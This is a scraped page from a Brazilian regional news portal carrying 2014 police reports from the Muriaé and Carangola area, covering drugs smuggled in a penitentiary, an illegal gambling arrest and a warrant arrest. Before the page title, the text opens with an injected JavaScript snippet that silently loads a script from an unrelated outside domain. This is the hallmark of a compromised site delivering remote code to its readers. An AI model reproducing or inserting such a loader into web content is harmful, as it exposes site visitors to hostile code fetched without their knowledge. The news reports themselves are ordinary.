;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais Carangola e Região-11/11/47. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais Carangola e Região-11/11/47.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 11/11/2014

                        76ª CIA PM – MURIAÉ-MG

PM REGISTRA TRÁFICO DE DROGAS EM PENITENCIÁRIA DE MURIAÉ 

Em 10/11/2014, por volta das 16h, na Avenida Luciano Rodrigues Paula, Bairro Leblon, aa PENITENCIÁRIA Dr. MANOEL MARTINS LISBOA JR., o agente R.F.S. relatou que, após informações de tráfico de drogas, solicitaram mandado de condução coercitiva para os sentenciados L.R.N., de 33 anos, W.F.M., O.J.L.G., de 38 anos e L.S.S., de 33 anos. Sendo estes conduzidos ao HSP, onde negaram passar pelo procedimento médico. Dois destes sentenciados foram flagrados pela câmera interna da viatura prisional forçando vômito sendo encontrado debaixo do pé de um deles uma porção de maconha, uma porção maior da mesma droga e um invólucro de crack. Já na unidade, os sentenciados expeliram a droga, sendo recolhido 42 buchas de maconha, 08 de cocaína e uma de crack. Material apresentado na DPJ.

75ª CIA PM – CARANGOLA-MG

PM EFETUA PRISÃO POR CONTRABANDO E PRÁTICA DE “JOGO DO BICHO” EM FERVEDOURO

Em 10/11/2014, por volta das 15h, na Avenida Maria Amélia de Souza Pedrosa, no Centro, militares abordaram J.I.S., de 61 anos, o qual tinha acabado de sair do BAR DO CHICARELLI, tendo alegado que havia feito um jogo de bicho. Então deslocaram ao referido bar onde o autor S.A.C., de 55 anos, tentou se desvencilhar de alguns jogos de bicho, todavia foi contido, sendo localizado vasto material relacionado à contravenção penal, 08 pacotes fechados de cigarros e quatro maços que se encontravam expostos à venda e, na posse do autor, R$ 2.608,95. O autor foi preso em flagrante, assim como os autores S.P., de 73 anos, e L.C.M.F., de 44 anos, sendo estes conduzidos à DPJ.

PM CUMPRE UM MANDADO DE PRISÃO EM DIVINO

Em 10/11/2014, por volta das 17h20min, na Rua Guthemberg de Souza Filho, no Givisiez, militares efetuaram a prisão de M.B.S., contra quem havia um mandado de prisão em aberto. O autor foi conduzido à DPJ. 

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.